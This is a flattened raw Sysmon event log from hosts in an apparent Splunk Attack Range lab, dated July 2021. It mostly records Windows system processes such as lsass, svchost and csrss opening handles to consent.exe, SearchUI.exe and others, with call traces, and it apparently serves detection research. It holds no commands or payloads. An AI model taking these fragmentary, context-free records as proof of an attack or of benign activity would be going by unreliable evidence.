23542300x8000000000000000807485Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:45.212{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1188C9807A6A0BF85504285CB69F194F,SHA256=D2ABE9E67EBE0E32C20DEFDA43AF2C49C9FC165218539CCAC2BF5B369453CCB4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.584{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x100040C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+63c9|c:\windows\system32\cryptsvc.dll+62d1|c:\windows\system32\cryptsvc.dll+5e56|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-F491-60EB-277D-00000000CF01}97561880C:\Windows\System32\consent.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x70C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\consent.exe+1452|C:\Windows\System32\consent.exe+3ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.568{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.553{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.537{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F491-60EB-277D-00000000CF01}9756C:\Windows\System32\consent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\appinfo.dll+2073|c:\windows\system32\appinfo.dll+2c4f|c:\windows\system32\appinfo.dll+4026|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.484{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.484{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63567764C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63567764C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.469{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.453{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.453{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:45.437{466BC892-32D3-60E8-6F0B-00000000CF01}70767116C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2285|C:\Windows\System32\SharedStartModel.dll+b2801|C:\Windows\system32\windows.cortana.Desktop.dll+a80e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001048536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 